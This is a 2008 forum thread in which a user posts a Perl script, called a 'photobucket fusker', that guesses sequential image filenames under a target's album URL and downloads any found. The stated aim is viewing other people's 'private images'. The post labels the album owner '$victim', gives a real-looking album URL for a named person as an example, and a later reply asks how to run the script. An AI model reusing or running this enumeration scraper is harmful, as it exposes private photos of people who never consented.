View previous topic :: View next topic |
Author |
Message |
rzers Advanced Cheater
Reputation: 0
Joined: 03 Oct 2006 Posts: 50
|
Posted: Wed Apr 02, 2008 12:17 pm Post subject: PERL photobucket fusker |
|
|
Just ripped this one from zer0-day.net with permissions...
___
it searches for pictures on private photobuckets.
example: perl photo.pl 0 100 URL OF PHOTOBUCKET USER
example: perl photo.pl a z URL OF PHOTOBUCKET USER
http://s220.photobucket.com/albums/dd76/CINDYMILEN A/
Code: | #!/usr/bin/perl -w
####################
# x90
# photobucket fusker
####################
use strict;
use WWW::Mechanize;
my $start = $ARGV[0];
my $end = $ARGV[1];
my $victim = $ARGV[2];
my $mech = WWW::Mechanize->new();
################################################################################
##
foreach my $fusk ("$start" .. "$end") {
my $url = "$victim$fusk.jpg";
$mech->get( $url );
my $link;
if ($link = $mech->success()) {
my $lurl = $url;
$mech->get( $lurl, ":content_file" => "$fusk.jpg");
}
else {
print "Image $fusk.jpg not found\n";
}
################################################################################
##
} |
_________________
...::: www.zer0-day.net :::...
The best online place for hacking,cracking,exploits,programming,and LEARNING! <3 |
|
Back to top |
|
 |
Clavinbui Master Cheater
Reputation: 0
Joined: 08 Dec 2007 Posts: 477 Location: New York
|
Posted: Wed Apr 02, 2008 4:05 pm Post subject: |
|
|
why tell us this
_________________
|
|
Back to top |
|
 |
rzers Advanced Cheater
Reputation: 0
Joined: 03 Oct 2006 Posts: 50
|
Posted: Wed Apr 02, 2008 11:42 pm Post subject: |
|
|
Cause some1 actually wants to see the private images for ppl on PB...
If u dont like it, dont use it =)
_________________
...::: www.zer0-day.net :::...
The best online place for hacking,cracking,exploits,programming,and LEARNING! <3 |
|
Back to top |
|
 |
SniperHill How do I cheat?
Reputation: 0
Joined: 09 Feb 2007 Posts: 2
|
Posted: Sat Feb 21, 2009 10:58 am Post subject: |
|
|
Lol, is this still workin =_= can someone explain how to do it?
|
|
Back to top |
|
 |
|